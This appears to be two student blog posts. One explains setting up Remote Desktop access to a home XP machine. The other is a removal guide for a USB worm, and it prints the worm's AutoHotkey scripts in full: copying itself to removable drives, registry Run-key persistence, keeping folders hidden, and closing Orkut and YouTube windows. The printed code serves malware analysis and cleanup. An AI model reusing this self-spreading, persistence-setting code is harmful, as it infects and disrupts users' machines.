CONNECT TO REMOTE COMPUTER

First, I'm going to assume that you want to connect using Remote Desktop. Using that, when you finally do connect, you'll have access to the remote computer almost as if you were sitting in front of it. The bad news here, is that Remote Desktop is a feature of Windows XP Pro, and is not present in XP Home. You'll only be able to access your XP Pro machines using Remote Desktop.

Our first barrier is your place of work. Depending on how they are connected to the internet, you simply may not be able to connect out. Larger corporations often restrict what protocols are allowed to access the internet. Quite often they restrict access to Web surfing and Email. If that's the case where you work, there's little recourse, other than pleading with your IT department to allow the Remote Desktop protocol (on port 3389) to reach the internet.

The next barrier, or at least point of confusion, is your IP address. The easiest scenario is if you have a static IP address at home. That way you'll always know what IP address to connect to. In fact, if you have a static IP, you can even register and assign a domain to it, so that you can access your home network by name - something like myhome.mydomain.com - rather than IP address.

If you have a dynamic IP address, you can still get to your network, you simply need to know what the current IP address is. There are several approaches, however none of them are really elegant. For example, you can call home and ask someone to visit a site such as Plot IP, which will display your IP, and then having them read it to you over the phone. If you have access to a web server's access logs, you can have your computer at home visit a specific web page periodically and retrieve the IP address from the logs. And finally there are tools that you can use to map a domain name - like myhome.mydomain.com - to a dynamic IP. These tools do require that you install software on your computer to detect IP address changes, and when a change occurs, it may take up to 48 hours for the DNS changes to make their way across the internet.

The good news about a dynamic IP is that if your router stays connected continuously, the IP address is actually not likely to change often. The next barrier is your router. A router acts as a firewall, and prevents most connections coming in from the internet. Most people only connect out, to surf the web, download files or read email, so that's not a problem for them. But connecting from a remote location to your home is a connection coming in from the outside.

The router needs to be configured to forward port 3389 (the Remote Desktop Protocol port) to the computer you want to connect to. Unfortunately exactly how that's done will vary depending on kind of router you have - you'll have to check the documentation. Note that I said you need to configure it to forward to the computer you want to connect to. You can access only one of your computers directly through your router this way. (There are techniques where you can specify that Remote Desktop listen on ports other than 3389. Then by using a different such port for each computer, and forwarding each through the router to the appropriate computer you can connect directly to each. That's beyond the scope of this article, and more complex than most folks will want to deal with.) My approach, for what it's worth, is to allow external remote access to only one machine on my network. Once connected to that machine I can if needed use remote desktop on it to connect to any other machine on my network. It can be a little confusing from a UI perspective, knowing which of the three machines connected in sequence my keystrokes are actually going to, but in practice I don't do it often.

Our final barrier is your IP address on your LAN. Your IP address on the internet, wether static or dynamic, is assigned by your ISP and really identifies only one device: your router. Within your local network, the router then typically assigns local IP addresses to all of your computers. The router then handles making sure that all the data traveling between the computers on your local network and the internet all go to the right computers. Those local IP addresses never leave your network - the internet sees only your router's IP address. So when you configure your router to forward port 3389 to a computer, you need to select one of your local computers, and configure its IP address as the destination for Remote Desktop. Then, when the router receives a Remote Desktop request from the internet, it forwards that request to the computer whose IP address you configured. The "problem" is that your local network is, more than likely, using dynamic IP addresses. That means that the IP address that are assigned to each computer could change over time.

If you leave your computers on all the time, the addresses won't change, and you're probably OK configuring the router with the current IP address of the computer you want to access remotely. If it ever changes, you'll need to update your router's port forwarding configuration for port 3389. If that's unacceptable or inconvenient, the only real solution is to configure one of your computers to have a static IP address, and then configure the router to forward to that one as the Remote Desktop target. Depending on your router it can be as easy as: Configuring the router to assign IP addresses from one range ... say 192.168.1.100 and up. Configuring the TCP/IP properties of one of your machines to be a static IP, and defining it with a value out of that range - say, 192.168.1.2 (normally 192.168.1.1 is reserved for the router itself). In many cases that's enough. In cases where other machines on your network cannot "see" this one machine, it may be necessary add an entry to the "hosts" file on all the other machines that defines the static IP address for this one machine: 192.168.1.2 machinename • As you can see, things get fairly complex fairly quickly. There are other solutions, but I've not tried any of them myself so I'm not qualified to comment on their suitability or their ease of setup: Commercial solutions such as PC Anywhere, or GoToMyPC. VNC (Virtual Network Computing) solutions that operate much like Remote Desktop. RealVNC is one example. VPN (Virtual Private Network) solutions that create a virtual connection to your entire local network. In recent years, some types of routers come with VPN support built in.

This blog is written with the help of books @ networking by AJAY GUPTA & @Ethical Hacking by Ankit Fadia & also some other blogs.

Mainak Bhattacharya
EE, 2nd Year, GNIT, www.mainakkol.co.nr

REMOVE MUHAHAHA TROJAN

It’s time to KILL the Worm:

I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3(which produces the sound), Icon.ico, reproduce.txt(on C language), svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text files.

[offspring] - Blank Folder

2.mp3 - A laughing sound

Icon.ico - A blank Icon file

reproduce.txt :: a simple copying program

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

svchost.exe :: the main culprit

This is the file that is the culprit. The file responsible for all the annoying pop ups

script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return

std.txt

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube. Most important information it gave was the Registery Keys it modified(most important part).

These are the keys that were responsible for the hidden folder problem I faced earlier ::

AFFECTED ENTRY ::

REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2

ORIGINAL ENTRY ::

REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,1

Now to rectify this go to Start Menu>Run and type regedit. In the Registry Editor browse to this entry

:: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

and in the “Checked Value” key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder

:: C:\heap41a and clear all the key entries from this registry entry :: HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run which says heap41a.

Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.

All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.

HAPPY REMOVING THE VIRUS :: I'M VERY HAPPY BECAUSE I HAD TO FORMAT 2 TIMES BEFORE I FOUND THIS VIRUS :: MAY BE IT HELPS YOU....

for further assistance you can Email me. visit my website :: www.mainakkol.co.nr

Mainak Bhattacharya
EE, 2nd Yr, GNIT, Email: mainakkol@gmail.com